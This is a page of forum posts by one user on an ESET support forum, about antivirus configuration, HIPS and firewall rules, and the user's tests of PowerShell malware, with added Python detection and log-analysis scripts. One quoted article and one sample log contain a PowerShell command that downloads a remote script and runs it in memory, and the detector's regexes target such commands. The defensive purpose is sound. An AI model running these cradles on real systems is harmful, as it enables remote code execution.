itman

Posts posted by itman

  1. I have a solution to this issue.

    Drop the GUI referral option altogether. Return to the prior e-mail based referral option as done in the past: https://www.dmnews.com/channel-marketing/social/news/13059759/eset-deploys-forwardtoafriend-emails-to-boost-sales-and-customer-acquisition which is less likely to be abused. Also, the forum won't be cluttered up with never ending postings about the issue.

  2. I haven't used Eset's Policy modes for either firewall or HIPS settings. However, policy mode in other security software usually means only rule based "allow" activity and everything else is blocked by default. Or using an expanded definition, only allow and block rules are permitted. The concept of "ask" rules/activity falls in the scope of interactive monitoring. For example, an ask rule by definition will offer a user the option to manually create a rule. This by definition violates the concept of employing a fixed policy.

  3. 1 hour ago, Rami said:

    I guess that if you password protect your settings in ESET it will prompt you to put your password once you try to uninstall it. It's my guessing, I don't know, I might be wrong, correct me if I am wrong.

    Actually, it's much more restrictive. Any Eset GUI access requires the password to be entered. One reason why I don't use the option.

  4. Here's a recent posting on the Malwarebytes forum where an Avast user was having similar issues: https://forums.malwarebytes.com/topic/241898-avast-service-high-cpu-and-malwarebytes-web-protection/ . Appears they recently updated MBAM which appears to have resolved that issue. So you might want to try to do the same.

    The bottom line is MBAM 3.x is conflicting with a lot of other AV solutions. You should never be running more than one AV in realtime mode. It is recommended that MBAM realtime scanning be disabled and MBAM only used as a second-opinion on-demand scanner.

  5. To exclude a file from Realtime scanning, you enter the item in the "Exclusions" section in the Eset GUI Real-time file system protection section. Click on the gear symbol and select "Edit exclusions." As far as selection criteria goes:

    Quote

    Examples

    If you wish to exclude all files in a folder, type the path to the folder and use the mask “*.*”.

    To exclude an entire drive including all files and subfolders, use the mask "D:\*".

    If you want to exclude doc files only, use the mask “*.doc”.

    If the name of an executable file has a certain number of characters (and characters vary) and you only know the first one for sure (say “D”), use the following format: “D????.exe”. Question marks replace the missing (unknown) characters.

    https://help.eset.com/eis/12/en-US/idh_config_exclude.html
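The four mask forms quoted from the ESET help above (folder mask `*.*`, drive mask `D:\*`, extension mask `*.doc`, fixed-length name mask `D????.exe`) can be checked against a path with a small matcher. The code below is an added example written for this page; it is not ESET's own exclusion engine, and it assumes two things the help text does not spell out: that `*` also matches backslashes (so a folder or drive mask covers subfolders) and that a mask with no drive or folder component is matched against the file name alone. The exclusion list and the paths in the tests are constructed.

```python
import re
from pathlib import PureWindowsPath

# Constructed exclusion list: one entry for each mask form in the ESET help text.
EXCLUSIONS = [
    r"C:\Tools\*.*",   # every file in the folder (and, by our assumption, its subfolders)
    r"D:\*",           # the whole drive
    r"*.doc",          # .doc files anywhere on the system
    r"D????.exe",      # 'D' followed by exactly four unknown characters, then .exe
]


def mask_to_regex(mask: str) -> re.Pattern:
    """Translate an exclusion mask into an anchored, case-insensitive regex.

    '*' becomes '.*' (any run of characters, path separators included) and
    '?' becomes '.' (exactly one character); everything else is literal.
    """
    parts = []
    for ch in mask:
        if ch == "*":
            parts.append(".*")
        elif ch == "?":
            parts.append(".")
        else:
            parts.append(re.escape(ch))
    return re.compile("^" + "".join(parts) + "$", re.IGNORECASE)


def has_path(mask: str) -> bool:
    """Assumption: a mask containing a drive letter or backslash is matched
    against the full path; a bare file mask is matched against the file name."""
    return "\\" in mask or ":" in mask


def matching_masks(path: str, exclusions=EXCLUSIONS) -> list:
    """Return every mask in `exclusions` that covers `path` (empty list if none)."""
    name = PureWindowsPath(path).name
    hits = []
    for mask in exclusions:
        target = path if has_path(mask) else name
        if mask_to_regex(mask).match(target):
            hits.append(mask)
    return hits


def is_excluded(path: str, exclusions=EXCLUSIONS) -> bool:
    """True when at least one exclusion mask covers the path."""
    return bool(matching_masks(path, exclusions))


if __name__ == "__main__":
    for p in [r"C:\Tools\app.exe", r"C:\Users\me\report.docx", r"C:\bin\D1234.exe"]:
        print(p, "->", matching_masks(p) or "scanned")
```

Because an excluded path is never scanned, it is worth running a list like this through the matcher before saving it: a folder mask with a trailing `*.*` silently covers every subfolder, and a bare extension mask such as `*.doc` applies everywhere, not just in the folder you had in mind.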

  6. My Internet Security license will be expiring soon.

    I have purchased a license for Smart Security. Would like to experiment with the password manager feature. I have extensive custom settings for Internet Security and do not want to manually reenter all of them into Smart Security. If EIS Import is not possible into Smart Security, I will just stick with Internet Security.

    Also, I have seen registry settings related to ESS on my EIS build. Is there anyway to convert my existing EIS install to ESS without removing EIS and installing ESS?

  7. According to Fortinet which does annual threat landscape reporting, the "hands down winner" is exploits:

    Quote

    Understanding exploit trends or how ransomware works and spreads, the better we can avoid the impact caused by the next WannaCry. The malicious ransomware and its variants achieved great scale with hundreds of organizations affected across the world at once.

    • Ransomware: Just under 10% of organizations detected activity associated with ransomware. On any given day, an average of 1.2% dealt with ransomware botnets running somewhere in their environment. The peak days of activity fell on weekends, with the hope of slipping traffic past weekend security operations staff. As the average traffic volume of various ransomware botnets increased, the average number of firms impacted by them rose as well.
    • Exploit Trends: 80% of organizations reported high or critical-severity exploits against their systems. The majority of these targeted vulnerabilities were released in the last five years, but no shortage of attempts was made against premillennial CVEs. Exploit distribution was pretty consistent across geographical regions, likely because a huge proportion of exploit activity is fully automated via tools that methodically scan wide swaths of the Internet probing for opportunistic openings.

    https://www.fortinet.com/corporate/about-us/newsroom/press-releases/2017/fortinet-threat-landscape-report.html

    Therefore one's number one security priority should be ensuring all their devices have applied all available OS and app software patches as soon as they are available.

  8. 1 hour ago, Euan_Clark__ said:

    My ESET antivirus has seemingly uninstalled itself, it doesn't show up in the hidden icons tray and I can't find the ESET GUI anywhere

    Using Windows Task Manager, verify if these two processes are running: Eset service and Eset Main GUI. Appears some type of corruption may have occurred to the Eset GUI process, egui.exe, and it terminated itself. Did you try a reboot to see if the Eset GUI reestablishes itself as a desktop toolbar icon?

    Also if Eset was totally disabled/removed, Windows Defender should now be running in realtime mode? Is that the case?

  9. One of the main problems with amateur malware testers is their testing of malware samples outside of the context by which they are actually deployed. For example if one wants to test a security product's capability to protect against fileless ransomware delivered via remote execution, they need to run:

    Quote

    Loading scripts directly in memory

    An attacker can perform remote execution of a script by directly executing it in memory to bypass endpoint security. Here is a command line example that uses the DownloadString method to download content from a remote location to a buffer in memory:

    powershell.exe -ep Bypass -nop -noexit -c iex ((New-Object Net.WebClient).DownloadString('https://[website]/malware.ps1'))

    The purpose of the “Bypass” parameter is to bypass execution policies so that administrators can remotely execute commands. However, attackers can also use the same parameter to bypass security. Because using this parameter doesn’t result in any configuration change, it’s a common target to bypass.

    https://securingtomorrow.mcafee.com/business/fileless-malware-execution-with-powershell-is-easier-than-you-may-realize/

    Of course, they also need something locally to allow for the startup of powershell.exe remotely which frequently is the backdoor components of PowerSploit: https://attack.mitre.org/software/S0194/ 

    -EDIT- Also in the above McAfee remote execution of PowerShell example, detecting, blocking, and cleaning the script ransomware code from memory stops the ransomware from executing. Powershell.exe would still be running but would not be executing anything.

    It is also a good idea to create a firewall rule to block all outbound traffic from powershell.exe.
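The McAfee excerpt above names the pieces of an in-memory PowerShell launch that a defender can look for in process-creation telemetry: the execution-policy bypass, `-nop`, `iex`, and a `Net.WebClient`/`DownloadString` cradle. The script below is an added example, not code from the post or from McAfee or ESET; it runs a small set of such indicators over constructed process-creation log lines (a key=value layout loosely modelled on a Sysmon event 1 export, not real telemetry) and grades each PowerShell launch. The URL in the sample is a placeholder, and the indicator names and severity rules are this example's own choices.

```python
import re
from typing import Dict, List, Tuple

# Constructed process-creation log lines (not real telemetry). Each line is a
# set of key=value fields; CommandLine may itself contain spaces.
SAMPLE_LOG = [
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "CommandLine=powershell.exe -File C:\\scripts\\backup.ps1 "
    "ParentImage=C:\\Windows\\System32\\svchost.exe",
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "CommandLine=powershell.exe -ep Bypass -nop -noexit -c iex "
    "((New-Object Net.WebClient).DownloadString('https://[placeholder]/script.ps1')) "
    "ParentImage=C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
    "Image=C:\\Windows\\System32\\notepad.exe "
    "CommandLine=notepad.exe readme.txt "
    "ParentImage=C:\\Windows\\explorer.exe",
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "CommandLine=powershell.exe -ExecutionPolicy Bypass -NoProfile -Command Get-Service "
    "ParentImage=C:\\Windows\\explorer.exe",
]

# Indicators drawn from the excerpt above. PowerShell accepts abbreviated
# parameter names, so each pattern covers the short and long spellings.
INDICATORS = {
    "execution_policy_bypass": re.compile(r"-(?:ep|ex|exec|executionpolicy)\s+bypass", re.I),
    "no_profile": re.compile(r"-(?:nop|noprofile)\b", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "download_cradle": re.compile(r"downloadstring|downloadfile|net\.webclient", re.I),
}

FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|$)")


def parse_line(line: str) -> Dict[str, str]:
    """Split a key=value log line; a value runs until the next ' key=' token."""
    return {k: v for k, v in FIELD_RE.findall(line)}


def assess(line: str) -> Dict:
    """Grade one process-creation record.

    'high'   : remote content is fetched and executed straight from memory
               (cradle plus Invoke-Expression), the pattern the excerpt describes.
    'medium' : bypass / no-profile flags alone, which admins also use legitimately.
    'none'   : nothing matched, or the process is not PowerShell at all.
    """
    fields = parse_line(line)
    image = fields.get("Image", "").lower()
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return {"powershell": False, "hits": [], "severity": "none", "parent": ""}
    cmd = fields.get("CommandLine", "")
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    if "download_cradle" in hits and "invoke_expression" in hits:
        severity = "high"
    elif hits:
        severity = "medium"
    else:
        severity = "none"
    return {"powershell": True, "hits": hits, "severity": severity,
            "parent": fields.get("ParentImage", "")}


def scan(log: List[str]) -> List[Tuple[int, Dict]]:
    """Return (line index, assessment) for every record that raised a flag."""
    return [(i, r) for i, r in enumerate(map(assess, log)) if r["severity"] != "none"]


if __name__ == "__main__":
    for idx, result in scan(SAMPLE_LOG):
        print(f"line {idx}: {result['severity']:6s} {result['hits']} parent={result['parent']}")
```

The parent process is carried through because it is usually the deciding context: the same command line launched from an interactive console by an administrator and from a WMI provider host on an unattended machine call for different responses, which is also the point the later posts on this page make about manually started PowerShell sessions.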

  10. I ran another test employing PowerShell the way the script should have been tested.

    First, I temporarily excluded my keylogger script from detection by Eset realtime scanning so I could copy it to the clipboard. I then fired up PowerShell ISE and copied the keylogger code to it. Finally, I ran the code as a script from PowerShell ISE:

    [Screenshot: Eset_ISE_Detection.png]

    As the above screenshot shows, the script was not allowed to run due to detection of malicious content by Eset. Initially I did not get an alert from Eset. Appears Eset won't show it until all corrective action has been completed. However, the Eset Detected Threats log shows Eset first detected malicious code prior to script file creation via AMSI scanning:

    [Screenshot: Eset_Alert_1.png]

    Next Eset blocked creation of the script in an AppData folder:

    [Screenshot: Eset_Alert_2.png]

    Overall, a very good showing of Eset PowerShell script protection.

    Oh, the minute I tried to access the script folder containing my original keylogger script, Eset deleted that:

    [Screenshot: Eset_Alert_3.png]

  11. My "memory returned" in regards to cleanmgr.exe use of dismhost.exe. As I recollect, cleanmgr.exe actually runs dismhost.exe as a shell process from dism.exe. It is therefore imperative when creating user HIPS rules to pay attention to what is shown on the command line in the Eset alert.

    As I stated previously, I don't have any rules created specifically for dismhost.exe. Additionally it can be run under certain situations in regards to the "sfc.exe /scannow" command line and compattelrunner.exe execution, to name a few legit Windows processes. Unfortunately dismhost.exe running in the context of cleanmgr.exe has been used maliciously in the past: https://threatpost.com/windows-uac-bypass-leaves-systems-open-to-malicious-dlls/119468/ and https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/ . The same is true for other legit Windows processes. It is therefore imperative that one always runs UAC at its highest level, which will thwart most of these UAC bypasses. Unfortunately, this dismhost.exe UAC bypass was not one of them.

  12. I will also add there is a bit of "misguided trickery" in this PowerShell video.

    I have used in the past a .Net based PowerShell global keylogger script that Eset now detects as malicious. I restored the script from Eset's Quarantine. I then attempted to Edit the script. This in turn caused Powershell ISE to load. It in turn tried to load the PowerShell script for editing. I immediately got an alert from Eset that malware was detected upon attempted file access to the script:

    [Screenshot: Eset_PowerShell_Alert.png]

    Additionally, Eset blocked the attempt by PowerShell to access the script:

    [Screenshot: Eset_PS_Script.png]

  13. Hum ... Here we go again!

    Your video clearly shows Eset detecting the PowerShell based ransomware when run as designed and frequently done via the command shell interface.

    You then open the PowerShell GUI interface and run the unpacked/unobfuscated/decrypted script. You wonder why Eset couldn't stop the ransomware running under PowerShell although it detected it in memory. The simple answer is because you manually started the PowerShell GUI interface. As such Eset won't terminate it since it is viewed as legit system activity. Eset is designed to detect PowerShell based malware as it is deployed "in the wild." That is when its malicious execution is attempted via external startup means.

    The only way an attacker could duplicate what you did is if he logged on a device remotely and then started, as you did, the PowerShell GUI. The only way this would go unnoticed is if the PC was unattended. Finally if the attacker could gain remote access, he could have just unloaded all the target device's files and deleted them afterwards on the target device.

    If you are going to perform malware testing, please do so properly.

  14. 9 hours ago, Moneesh said:

    As of now, as per your suggestion I have installed trial version of Eset Internet Security 12.0.31.0 (still 25 days left :) )

    Make sure you create an Eset firewall rule to block outbound C:\Windows\SysWOW64\dllhost.exe traffic as you did for the Win firewall. Set the logging level to warning. Then periodically monitor the Eset Networking log for any entries related to dllhost.exe. If no log entries appear after a few days, then we can safely assume the TinukeBot trojan has been removed.

    You need to create the Eset firewall rule since Eset disables the Win firewall.

  15. I have a HIPS rule that monitors all process startups in %Appdata% directories. The only process that I allow via specific HIPS rule to do so is cleanmgr.exe. Windows has a scheduled task that runs cleanmgr.exe periodically; i.e. SilentCleanup. Cleanmgr.exe in turn runs dismhost.exe. I have no specific HIPS rules for dismhost.exe. To my best knowledge, the HIPS by default allows all child processes if the parent process is allowed.

    If you are receiving alerts on dismhost.exe, you must have created a HIPS rule previously to do so.

    Note that if you are going to create user HIPS rules, it is up to you to monitor that they are being correctly applied and functioning as you expect. Eset doesn't encourage users to create HIPS rules. As such, you will only receive minimal support in this regard from Eset.

    -EDIT- If you see dismhost.exe running frequently, it is indicative of possible Win OS issues. You can Google on "dismhost.exe" about this.

  16. Awaiting detailed analysis of your logs by Eset once you submit them, it appears that explorer.exe is not the legit Windows one or malware is injecting malicious code into it.

    Explorer.exe is connecting to IP address 212.47.229.211. This IP address is associated with a legit but low reputation ISP, SAS Online, located in Paris, France. Since you are located in Pakistan, I assume that is not the ISP you are using? Appears Eset is interpreting this as botnet activity and terminating the source which in this case is explorer.exe.

    To begin with, I would submit C:\Windows\explorer.exe to VirusTotal for a scan and see if a majority of the AV scanners there label it as malware.
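Posts 14 and 16 above both come down to the same check: a named system process (`dllhost.exe` from SysWOW64, `explorer.exe`) should not be producing outbound connections, and the network log is watched until it has been quiet for a few days. The script below is an added example, not part of either post and not ESET's log format; it parses constructed, semicolon-separated firewall log lines (time; action; application; remote endpoint; protocol; rule), summarises the entries for each watched process, and answers the "no entries after a few days" question. The watch list, the log lines, the rule names and the documentation-range addresses (203.0.113.x, 198.51.100.x) are all constructed for the example.

```python
from datetime import datetime, timedelta
from typing import Dict, List

# Processes that should never initiate outbound traffic on this machine
# (lower-cased full paths, so a copy in another folder does not match).
WATCHLIST = {
    r"c:\windows\syswow64\dllhost.exe",
    r"c:\windows\explorer.exe",
}

# Constructed log lines in an invented layout:
# time;action;application;remote_ip:port;protocol;rule
SAMPLE_LOG = [
    "2019-01-10 09:12:01;Blocked;C:\\Windows\\SysWOW64\\dllhost.exe;203.0.113.10:443;TCP;Block dllhost outbound",
    "2019-01-10 09:12:31;Blocked;C:\\Windows\\SysWOW64\\dllhost.exe;203.0.113.10:443;TCP;Block dllhost outbound",
    "2019-01-11 14:03:55;Allowed;C:\\Program Files\\Mozilla Firefox\\firefox.exe;198.51.100.7:443;TCP;Allow browser",
    "2019-01-12 22:40:09;Blocked;C:\\Windows\\explorer.exe;203.0.113.77:8080;TCP;Botnet protection",
]


def parse(line: str) -> Dict:
    """Split one log line into typed fields; the rule name may contain ';'."""
    ts, action, app, remote, proto, rule = line.split(";", 5)
    ip, _, port = remote.rpartition(":")
    return {
        "time": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"),
        "action": action,
        "app": app,
        "ip": ip,
        "port": int(port),
        "proto": proto,
        "rule": rule,
    }


def summarize(log: List[str], watchlist=WATCHLIST) -> Dict[str, Dict]:
    """Per watched process: hit count, distinct remote IPs, and last activity."""
    out: Dict[str, Dict] = {}
    for rec in map(parse, log):
        key = rec["app"].lower()
        if key not in watchlist:
            continue
        s = out.setdefault(key, {"hits": 0, "remotes": set(), "last_seen": None})
        s["hits"] += 1
        s["remotes"].add(rec["ip"])
        if s["last_seen"] is None or rec["time"] > s["last_seen"]:
            s["last_seen"] = rec["time"]
    return out


def quiet_for(summary: Dict[str, Dict], app: str, now: datetime, days: int = 3) -> bool:
    """True when `app` has produced no log entries in the last `days` days.

    A process with no entries at all counts as quiet; the caller decides
    whether that silence is good news or a sign the rule is not logging.
    """
    s = summary.get(app.lower())
    if s is None:
        return True
    return now - s["last_seen"] >= timedelta(days=days)


if __name__ == "__main__":
    summary = summarize(SAMPLE_LOG)
    check_time = datetime(2019, 1, 14, 9, 0, 0)  # constructed "now" for the report
    for app, s in summary.items():
        status = "quiet" if quiet_for(summary, app, check_time) else "STILL ACTIVE"
        print(f"{app}: {s['hits']} hits, remotes={sorted(s['remotes'])}, "
              f"last={s['last_seen']:%Y-%m-%d %H:%M:%S} -> {status}")
```

Keying the watch list on the full lower-cased path matters for the dllhost case in particular: the post singles out the SysWOW64 copy, and a rule or report that matched on the bare file name would also catch the legitimate System32 instance and bury the signal in noise.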
